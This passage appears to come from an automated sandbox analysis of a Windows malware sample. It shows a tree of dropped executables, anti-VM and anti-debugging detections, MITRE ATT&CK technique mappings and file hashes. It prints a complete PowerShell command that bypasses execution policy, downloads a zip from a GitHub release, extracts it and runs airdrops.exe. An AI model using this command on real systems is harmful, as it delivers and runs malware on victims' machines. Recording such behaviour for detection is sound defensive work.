C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1009928001\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1732579844 " AI_EUIMSI=""4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2788
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009977001\feAo1nZ.exe"C:\Users\Admin\AppData\Local\Temp\1009977001\feAo1nZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Set-ExecutionPolicy Bypass -Scope Process -Force; Invoke-WebRequest -Uri 'https://github.com/directuser/mnemonic-checker/releases/download/1/airdrops.zip' -OutFile \"$env:APPDATA\\file.zip\"; Expand-Archive -Path \"$env:APPDATA\\file.zip\" -DestinationPath \"$env:APPDATA\\extracted\"; Remove-Item -Path \"$env:APPDATA\\file.zip\"; Start-Process \"$env:APPDATA\\extracted\\airdrops.exe\""4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4516
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009978001\a24584cedc.exe"C:\Users\Admin\AppData\Local\Temp\1009978001\a24584cedc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3464
-
-
C:\Users\Admin\AppData\Local\Temp\1009979001\496d44de32.exe"C:\Users\Admin\AppData\Local\Temp\1009979001\496d44de32.exe"3⤵PID:2416
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1784
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4564
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 25BB49EEFBC45850A9375B5C166F00FD C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2924
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:2116
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Component Object Model Hijacking
1Discovery
Peripheral Device Discovery
2Query Registry
7Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD55dd45593985c6b40d1d2dea0ce9a2fcf
SHA1700fb24d4f4e302ed94f755fa6f7caf9d6fb594e
SHA256237e715b292e3ebfdf7038d42290f9a6457f0375ee965e1236bd763bce413391
SHA512ca4e7df463b3d5643decfda936e4d7db1e3247c8f27a25ace150886a0c3ec2e79f1d82d2c4cbd5b89f42deaf4cd5709a7ca47d24a18ed1e1804b0c1e016966a3
-
Filesize
2.9MB
MD52ec142b97cf35b8089846aa53bb3bf63
SHA1cdfbc2b54c132e32be48b41660ede419c586ba9b
SHA25691aed4763f13b9fe40ac2ef9c5508a35aa689419f65a1d43ddb33b2c07e0e74b
SHA512b11642f4f0a83aabb67603aedff479d0d714e4e5341ff159d5ee312dc437b5da94f5eaccc8dff6b63750ec60457148576b215f958db1c6cf2a06be3095e19fa4
-
Filesize
1.6MB
MD518cf1b1667f8ca98abcd5e5dceb462e9
SHA162cf7112464e89b9fa725257fb19412db52edafd
SHA25656a8033f43692f54e008b7a631c027682e1cabd4450f9f45ce10d4fc10f3fcf3
SHA512b66be8acac0152ae3a9a658fde23f3f3ad026e3f8099df5c8771eb1524e8baa2ba9f88b9577a85493f0e241089798e40a158325cb606345c94d979e0088443d0
-
Filesize
42KB
MD556944be08ed3307c498123514956095b
SHA153ffb50051da62f2c2cee97fe048a1441e95a812
SHA256a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181
SHA512aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13
-
Filesize
984KB
MD5a55d149ef6d095d1499d0668459c236f
SHA1f29aae537412267b0ad08a727ccf3a3010eea72b
SHA256c4a5fdd606768f6f69aa9e6cad874296c8e1e85f88b17f12b4ecab2c247c54ce
SHA5122c89c0b92afaf69e7c1a63e44ebbe41c7919ad74abd2b70a6077faa6a4ca24bc6103ddf584633cd177a858550c667b430668095c3dc9abb27fefa38940d4370b
-
Filesize
17.7MB
MD55f602a88eb5e8abb43c9035585f8dbef
SHA1b17a1bc278f0c7ccc8da2f8c885f449774710e4c
SHA25695b586a973d1b82e0ab59cd1127466d11fdf7fd352e10b52daa3e9a43d02d1f0
SHA5129575baf06700e8b10e03a20d80f570c6c9cf0ee09ad7589d58f096c7a73a5c17d31856b73120f9e38cd2ba2e13f1082b206ccbee3b070dd9b70b4e6460df5fff
-
Filesize
957KB
MD51ca29f32c02f847a6a2ce55775f92a8e
SHA1e98c84e034dbddb83dc9f6f2b56bd8332b9445e1
SHA256f607c51e418a43318045be784be9f311f77625931cc6ae17f39fb6c698cbee2e
SHA5120049d07f095fcc4702ba2d1dd0710033020a7f85fd2307b8665a54da89d6ff0f4c845dcc52e2e8d236471e9a580ff6e03b66617edd73b92eea249de98a8b3f33
-
Filesize
1.8MB
MD5fe7fb9fce44017e9650fadf0851ffffb
SHA15f2e8e26ba53bf996835917cd6bf8da7a0c48ffd
SHA2566c8a2ebe3061f4cba5540d03c6c20cacb70173ca6d250862fe51a173c74ea0d4
SHA512a86e22b71dce2142a5a4c5d9b48a3d69cc54c73ceedc691988e9a45aff4066112ede4aa820f8966071ddfa4c7e1d28361c9ef30938de0ce4ba0bc10a04d39e63
-
Filesize
1.7MB
MD5c7199ff1c5f695591c33069315052e3a
SHA12d5c03040c26c5cba6ae8f080c82ac6cb75e7e6d
SHA256aa0766db9945bf02ba2332f0cde32da92e9404c788fa4e3915d96c6d63ed97b7
SHA512cf9e108b7ec9bf5e15a41d4169ad4a648dbef0210860696f0114ae266dbf3053fe924a256b6bad95ab9d001c3014cdd053ca6f7280a26c77cf1069cd27f18c7c
-
Filesize
1.1MB
MD5b86d97a0a8eaff71d1197fb0225ca7d3
SHA14af82050162eca7043f7ee66f407e386547ab6a6
SHA256bd2ca9b7786b7bc86cc17828181fa0d63a7587b81dec70dfff0e4aec55983090
SHA512f65c88ab1d5c1a15732e9b9fed63803a45fd2bfee7cccfd9b7f7cb00b136b30fff879d0edec3b15159ec93d26fcc5c48b45f8b72045b4c6f14746762342dc677
-
Filesize
578KB
MD589afe34385ab2b63a7cb0121792be070
SHA156cdf3f32d03aa4a175fa69a33a21aaf5b42078d
SHA25636e35eafc91451a38ad7e7958156841cd2f004d5791fd862d5afa4d5f9df9103
SHA51214a851b3b4d3b8dbb9a2b3ea84d3c30fc9884a8924af0726a717c68db5e8f5e717dc78ca62e5f455010e46c1fecf294791b89f7426cc14ffdd4c84945518bb9c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.8MB
MD52973a8b36517005333545a7751a03f4f
SHA1ea5f6788309a5beb6d85f0e3abbe588598a7023b
SHA256126e371440a1d6372b23741aa24bd4b0ed00e7f90657a796b18c6c05ba003ae9
SHA512307406fb0a9a55d3cf54da1b2bfac2313defce6eb66e60ad832cb3915a642ebe54e26c85304c96ee1e63cd6ee0878a3b2a91e3cfa1e6771c4776a374daa22b67
-
Filesize
7KB
MD511092c1d3fbb449a60695c44f9f3d183
SHA1b89d614755f2e943df4d510d87a7fc1a3bcf5a33
SHA2562cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77
SHA512c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a
-
Filesize
2.8MB
MD5bf973011e42f25d8eaa92a8c6f441c4c
SHA122358a1877ab28ef1d266cc5a5c06d44b3344959
SHA25628ea007c4e157e619c2c495881ee0cc419f4c16ea45cefc71d2f9bef207a1c9e
SHA512fbd82523520adc1c90a9540239c90147e4cd828d1badefa283ec096c63cb4f53f1142d8cd5e0b35e570431cad20195749412513a627aab4b3d90e3b5b238d5bd